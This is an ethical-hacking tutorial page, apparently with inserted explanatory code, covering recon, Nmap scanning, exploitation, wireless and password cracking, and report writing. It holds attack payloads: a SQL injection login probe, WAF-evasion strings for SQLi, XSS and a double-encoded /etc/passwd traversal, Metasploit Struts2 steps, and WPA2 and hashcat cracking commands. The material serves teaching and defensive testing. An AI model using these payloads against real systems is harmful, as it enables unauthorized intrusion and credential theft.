Ethical Hacking Basics -- Recon, Scanning, Exploitation & Reporting
Ethical hacking is the authorized simulation of cyberattacks to identify vulnerabilities before malicious actors exploit them -- following a structured methodology of reconnaissance, scanning, exploitation, and reporting.
What You'll Learn
You will learn the five phases of ethical hacking, use tools like Nmap and Metasploit for recon and exploitation, and write professional penetration test reports that drive remediation.
Why It Matters
The global cybersecurity workforce faces a 4-million-person shortage. Organizations must find vulnerabilities proactively. Ethical hackers earn an average of $120,000 per year and perform critical work protecting infrastructure.
Real-World Use
A penetration tester for a healthcare provider discovers an unauthenticated SQL injection in the patient portal during the scanning phase. The report enables the engineering team to patch before an attacker finds and exploits it.
Phase 1: Reconnaissance
Reconnaissance gathers information about the target without direct interaction.
# Passive recon with Amass
amass enum -d example.com -o recon-results.txt
# Subdomain enumeration
sublist3r -d example.com -o subdomains.txt
# DNS enumeration
dnsrecon -d example.com -t axfr
Expected output: Lists of subdomains, IP addresses, mail servers, and name servers associated with the target domain.
Open Source Intelligence (OSINT) Tools
# Collect email addresses associated with a domain
theHarvester -d example.com -b google,linkedin,bing
# Discover subdomains and related certificates
curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sort -u
# Check data breaches for company emails
h8mail -t company.com -bc /path/to/breach-compilation.txt
Expected output: Lists of email addresses, employee names, subdomains, and potentially breached credentials that inform the attack surface.
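The crt.sh query above is usually piped through jq, but the raw JSON needs a little more care than `.[].name_value | sort -u` gives it: one certificate record packs all of its SAN names into a single newline-separated string, wildcard entries are not hosts, and lookalike domains that merely contain the target name come back too. The parser below is an added example, not code from the page; the JSON it parses is a constructed sample shaped like crt.sh output (only the `name_value` field is used, and the issuer values are placeholders).

```python
import json

# Constructed sample of the JSON crt.sh returns for ?q=%25.example.com&output=json,
# abbreviated to the fields this example uses; not a real query result.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "www.example.com\nexample.com"},       # one cert, two SANs
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3",
     "name_value": "*.dev.example.com"},                  # wildcard entry
    {"issuer_name": "C=US, O=DigiCert Inc",
     "name_value": "mail.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc",
     "name_value": "WWW.Example.com"},                    # duplicate, different case
    {"issuer_name": "C=US, O=Example CA",
     "name_value": "example.com.evil-lookalike.net"},     # out of scope
])


def extract_subdomains(crtsh_json, domain):
    """Return the sorted, unique hostnames in scope for `domain`.

    - each record may yield several names (newline-separated SANs)
    - '*.' is stripped, because the wildcard itself is not a host
    - names are lower-cased and trailing dots removed before de-duplication
    - only the domain itself and its subdomains are kept, so a lookalike
      domain that merely contains the target name never enters the scope
    """
    domain = domain.lower().rstrip(".")
    names = set()
    for record in json.loads(crtsh_json):
        for raw in record.get("name_value", "").split("\n"):
            name = raw.strip().lower().rstrip(".")
            if name.startswith("*."):
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    for host in extract_subdomains(SAMPLE_CRTSH_JSON, "example.com"):
        print(host)
```

Feeding it a real crt.sh response is a matter of replacing `SAMPLE_CRTSH_JSON` with the body returned by the curl command; the scope filter is the part worth keeping, since every name that passes it is a candidate for the scanning phase and must be covered by the engagement's authorization.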
Phase 2: Scanning
Scanning identifies live hosts, open ports, and running services.
# TCP SYN scan (stealth)
nmap -sS -sV -O -p- --min-rate 5000 -oA nmap-full target.com
# Service and version detection
nmap -sV -p 80,443 --script=http-headers,http-title target.com
Expected output: A complete port inventory with service versions. Open ports 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL) would each indicate different attack surfaces.
# Nmap result example
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu
80/tcp   open  http    nginx 1.24.0
443/tcp  open  http    nginx 1.24.0
3306/tcp open  mysql   MySQL 8.0.35
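The `-oA nmap-full` option in the scan above also writes a grepable `.gnmap` file, which is the form most convenient to turn into a port inventory for the report. The parser below is an added example, not code from the page or from Nmap; it reads a constructed `.gnmap` sample (address, hostname and versions are illustrative) and flags open backend services, such as the MySQL port in the output above, that should normally not be reachable from the scanner's vantage point at all. The list of such services is an assumption for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap grepable output (the nmap-full.gnmap file that
# "-oA nmap-full" writes). Values are illustrative, not a real scan.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -sV -O -p- -oA nmap-full 203.0.113.10
Host: 203.0.113.10 (target.example)\tStatus: Up
Host: 203.0.113.10 (target.example)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1 Ubuntu/, 80/open/tcp//http//nginx 1.24.0/, 443/open/tcp//ssl|http//nginx 1.24.0/, 3306/open/tcp//mysql//MySQL 8.0.35/, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65530)
# Nmap done at Mon Jan  1 00:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds
"""


@dataclass(frozen=True)
class PortRecord:
    host: str
    hostname: str
    port: int
    proto: str
    state: str
    service: str
    version: str


# "Host: <ip> (<name>)<TAB>Ports: <entries>[<TAB>Ignored State: ...]"
HOST_LINE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*?)(?:\tIgnored State:.*)?$")


def parse_gnmap(text):
    """Parse nmap -oG output into one PortRecord per port entry.

    Each entry is 'port/state/proto/owner/service/rpcinfo/version/'; the
    version is re-joined in case it contains a slash of its own.
    """
    records = []
    for line in text.splitlines():
        match = HOST_LINE.match(line)
        if not match:
            continue  # comment lines and "Status: Up" lines carry no ports
        host, hostname, ports_field = match.groups()
        for entry in ports_field.split(", "):
            parts = entry.split("/")
            if len(parts) < 7:
                continue
            port, state, proto, _owner, service, _rpc = parts[:6]
            version = "/".join(parts[6:-1])  # parts[-1] is empty (trailing '/')
            records.append(PortRecord(host, hostname, int(port), proto, state, service, version))
    return records


# Assumed list for the example: services that should sit behind the
# application tier, never be exposed to the network the scan ran from.
SHOULD_NOT_BE_EXPOSED = {"mysql", "ms-sql-s", "postgresql", "redis", "mongodb", "ms-wbt-server"}


def open_ports(records):
    return [r for r in records if r.state == "open"]


def exposed_backend_services(records):
    """Open ports whose service belongs on an internal network only."""
    return [r for r in open_ports(records) if r.service in SHOULD_NOT_BE_EXPOSED]


if __name__ == "__main__":
    recs = parse_gnmap(SAMPLE_GNMAP)
    for r in open_ports(recs):
        print(f"{r.host:15} {r.port:>5}/{r.proto} {r.service:10} {r.version}")
    for r in exposed_backend_services(recs):
        print(f"FINDING: {r.service} exposed on {r.host}:{r.port}")
```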
Vulnerability Scanning with Nuclei
# Run Nuclei (ProjectDiscovery) with the CVE, misconfiguration and exposure template sets
nuclei -u https://target.com -t cves/ -t misconfiguration/ -t exposures/
# Scan for specific OWASP Top 10 categories
nuclei -u https://target.com -tags sqli,xss,idor,lfi -severity critical,high
# Export results for reporting
nuclei -u https://target.com -json -o nuclei-results.json
Expected output: Nuclei identifies CVEs matching the target technology stack, misconfigurations like exposed .git directories or default credentials, and information disclosure endpoints.
Phase 3: Enumeration
Enumeration extracts detailed information from discovered services.
# Web directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -o dirs.txt
# HTTP header inspection
curl -sI https://target.com | grep -i '\(server\|x-powered-by\|x-frame-options\)'
Expected output: Directory listings, admin panels, backup files, and server header information revealing the technology stack.
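The header check above is easy to turn into repeatable findings. The script below is an added example (not code from the page); it takes the raw response headers exactly as `curl -sI` prints them, here a constructed sample, and reports version disclosure in `Server`/`X-Powered-By` plus missing security headers. The header set, severity labels and recommendation wording are assumptions chosen to line up with the report table later on this page.

```python
import re

# Constructed sample of what `curl -sI https://target.com` prints; not a real host.
SAMPLE_HEADERS = """\
HTTP/2 200
server: nginx/1.24.0
date: Mon, 01 Jan 2024 00:00:00 GMT
content-type: text/html; charset=utf-8
x-powered-by: PHP/8.1.2
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
"""

# Assumed for the example: headers whose absence becomes a finding, with the
# remediation text that goes into the report.
EXPECTED_SECURITY_HEADERS = {
    "content-security-policy": "Add Content-Security-Policy",
    "x-frame-options": "Add X-Frame-Options or a CSP frame-ancestors directive",
    "strict-transport-security": "Enable HSTS with a long max-age",
    "x-content-type-options": "Add X-Content-Type-Options: nosniff",
}

# A product name followed by a dotted version number, e.g. nginx/1.24.0
VERSION_PATTERN = re.compile(r"\d+\.\d+")


def parse_headers(raw):
    """Map lower-cased header names to values; the status line is skipped."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def review_headers(raw):
    """Return (severity, finding, recommendation) tuples for the response."""
    headers = parse_headers(raw)
    findings = []
    for name in ("server", "x-powered-by"):
        if name in headers and VERSION_PATTERN.search(headers[name]):
            findings.append(("Low", f"{name} header discloses version: {headers[name]}",
                             "Remove the version string from the header"))
    for name, fix in EXPECTED_SECURITY_HEADERS.items():
        if name not in headers:
            findings.append(("Medium", f"Missing {name} header", fix))
    return findings


if __name__ == "__main__":
    for severity, finding, fix in review_headers(SAMPLE_HEADERS):
        print(f"[{severity}] {finding} -> {fix}")
```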
Wireless Security Assessment
Testing wireless networks requires specialized tools and techniques.
# Enable monitor mode on wireless interface
airmon-ng start wlan0
# Capture beacon frames and probe requests
airodump-ng wlan0mon
# Crack WPA2 handshake (ethical testing only)
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <bssid> capture-01.cap
Expected behavior: The wireless adapter switches to monitor mode and captures nearby access points and clients. A WPA2 handshake is captured between a client and access point, then cracked offline.
Phase 4: Exploitation
Exploitation attempts to demonstrate impact using discovered vulnerabilities.
# Basic SQL injection test
import requests

# Classic tautology probe: the quote closes the password literal and the
# rest is interpreted as SQL if the query is built by string concatenation
payload = "' OR '1'='1"
url = f"https://target.com/login?username=admin&password={payload}"
response = requests.get(url, timeout=10)  # always set a timeout on test requests
if "Welcome" in response.text:
    print("SQL injection likely successful")
Expected behavior: If the application returns a success page instead of an error, the login form is vulnerable to SQL injection.
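Why the probe works, and what "Parameterize all queries" in the report table actually changes, is clearest with both versions of the login query side by side. The code below is an added example (not the page's), using an in-memory SQLite database with one constructed user row; the password is stored in plaintext purely to keep the demonstration short.

```python
import sqlite3

PAYLOAD = "' OR '1'='1"  # the same probe used in the test above


def make_db():
    """Constructed sample database: one user, plaintext password for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    return conn


def login_vulnerable(conn, username, password):
    # The defect: user input is spliced into the SQL text, so the quote in the
    # payload terminates the literal and "OR '1'='1'" becomes part of the WHERE
    # clause. AND binds tighter than OR, so the clause is always true.
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    # The remediation: placeholders are bound as data by the driver, so the
    # payload is compared as a string and never parsed as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload     :", login_vulnerable(db, "admin", PAYLOAD))      # True
    print("parameterized, payload  :", login_parameterized(db, "admin", PAYLOAD))  # False
    print("parameterized, real pw  :", login_parameterized(db, "admin", "correct horse battery staple"))
```

The same contrast is what the practice question on false positives relies on: a tautology that only flips a "Welcome" string is suggestive, while a parameterized query returning `False` for the payload and `True` for the real password is the behaviour a retest should confirm after the fix.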
# Metasploit basic usage
msfconsole
search cve:2026 type:exploit
use exploit/multi/http/struts2_content_type
set RHOSTS target.com
set RPORT 8080
check
Expected output: Metasploit confirms the target is vulnerable and provides a check result of "The target appears to be vulnerable."
Web Application Firewall Evasion
Test how WAFs handle common evasion techniques during penetration tests.
# SQL injection with comment obfuscation
curl "https://target.com/search?q=admin'/**/OR/**/1=1--"
# XSS with mixed-case tag name (defeats case-sensitive filters)
curl "https://target.com/search?q=<sCrIpt>alert(1)</sCrIpT>"
# Path traversal with double encoding
curl "https://target.com/download?file=%252e%252e%252fetc%252fpasswd"
Expected behavior: A well-configured WAF blocks these obfuscated payloads. A misconfigured WAF passes them through, revealing the application is vulnerable despite having a web application firewall.
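What separates the well-configured WAF from the misconfigured one in the passage above is canonicalization: decoding and normalizing the request before the rules run. The code below is an added example, not the page's and not any WAF product's code; it applies three deliberately simple signature rules to the three constructed probe query strings, first to the raw input (where every probe slips past) and then after normalization (bounded repeated URL-decoding, SQL inline-comment removal, whitespace collapsing and lower-casing).

```python
import re
from urllib.parse import unquote

# The three probes from the curl commands above, as the query strings a WAF
# would inspect (constructed; no target involved).
PROBES = {
    "sqli_comment": "q=admin'/**/OR/**/1=1--",
    "xss_mixed_case": "q=<sCrIpt>alert(1)</sCrIpT>",
    "traversal_double_encoded": "file=%252e%252e%252fetc%252fpasswd",
}

# Minimal rule set for the demonstration (assumed; real rule sets are far larger).
SIGNATURES = {
    "sqli": re.compile(r"'\s*or\s+\d+=\d+"),  # quote followed by OR n=n
    "xss": re.compile(r"<script\b"),
    "traversal": re.compile(r"\.\./"),
}


def naive_match(text):
    """Rule names that fire on the text exactly as received."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def canonicalize(raw, max_rounds=3):
    """Normalize a parameter string the way a WAF must before matching.

    URL-decoding is repeated until it stops changing (bounded, so a hostile
    input cannot keep the decoder busy), SQL inline comments become a space,
    runs of whitespace collapse, and the result is lower-cased so that case
    variation in tag names or keywords no longer matters.
    """
    value = raw
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def normalized_match(raw):
    """Rule names that fire after canonicalization."""
    return naive_match(canonicalize(raw))


if __name__ == "__main__":
    for label, probe in PROBES.items():
        print(f"{label:26} raw={naive_match(probe)} normalized={normalized_match(probe)}")
```

Each probe targets one gap in the naive matcher: the comment trick breaks the whitespace the SQL rule expects, the mixed case breaks a case-sensitive tag match, and double encoding hides `../` behind a second `%` layer. The defence is the same in all three cases, which is why canonicalization, not a longer signature list, is the first thing to check when a WAF "has rules for this" but still lets a payload through.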
Password Cracking with Hashcat
When you extract password hashes, Hashcat cracks them using GPU acceleration.
# Identify hash type
hashid -m '$2y$12$T8w2S0YKG0RFF8VxjKFHPO'
# Crack bcrypt hashes with a wordlist (straight attack), then display what was recovered
hashcat -m 3200 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 3200 hashes.txt --show
# Mask attack for 8-character alphanumeric passwords
hashcat -m 1000 ntlm-hashes.txt -a 3 ?a?a?a?a?a?a?a?a --increment
Expected output: Recovered plaintext passwords are displayed with the hash type and cracking speed. bcrypt (mode 3200) cracks at approximately 200 hashes per second on a consumer GPU, while NTLM (mode 1000) cracks at 20 billion hashes per second.
Phase 5: Reporting
Every finding requires clear, actionable documentation.
| Severity | Finding | CVSS | Recommendation |
|---|---|---|---|
| Critical | SQL injection on login endpoint | 9.8 | Parameterize all queries |
| High | SSL certificate expired | 7.5 | Renew and automate renewal |
| Medium | Missing CSP headers | 5.0 | Add Content-Security-Policy |
| Low | Server header discloses version | 2.5 | Hide server version string |
Common Errors
Scanning without authorization -- Running Nmap against a target without written permission is illegal in most jurisdictions. Always obtain a signed scope-of-work document first.
Relying solely on automated tools -- Tools miss business logic flaws like IDOR, race conditions, and privilege escalation. Manual testing is essential.
Skipping the enumeration phase -- Moving directly from scanning to exploitation misses critical context. Enumerate every service -- directory listings, API endpoints, and version-specific CVEs.
Destructive testing in production -- SQL injection can delete tables, and buffer overflows can crash services. Test in staging environments or use safe payloads.
Poor report writing -- Technical findings without business impact or remediation steps get ignored. Write for both the CISO (executive summary) and the developer (technical details).
Practice Questions
What is the difference between active and passive reconnaissance? Passive recon uses public sources like DNS records, search engines, and social media without touching the target. Active recon involves direct interaction like scanning and probing.
Why use a SYN scan (-sS) instead of a full connect scan? SYN scan sends only the first packet of the TCP handshake and never completes it, making it faster and less likely to be logged by applications that log full connections.
What does CVSS score 9.8 indicate? A CVSS of 9.8 is Critical severity -- typically a remotely exploitable vulnerability with no authentication required and high impact on confidentiality, integrity, and availability.
How do you verify a SQL injection is not a false positive? Confirm by extracting actual database information (version, user, database name) through the injection, or by observing different response times in time-based injections.
Challenge: Set up a vulnerable VM (DVWA or Metasploitable), perform a full penetration test through all five phases, and write a professional report with at least five findings including CVSS scores and remediation steps.
Mini Project
Conduct a penetration test against a deliberately vulnerable target like HackTheBox or TryHackMe. Document every step from reconnaissance through exploitation. Write a five-page report with an executive summary, technical findings, CVSS scores, and prioritized remediation recommendations.
Built by the developers of Doda Browser, DodaZIP, and Durga Antivirus Pro.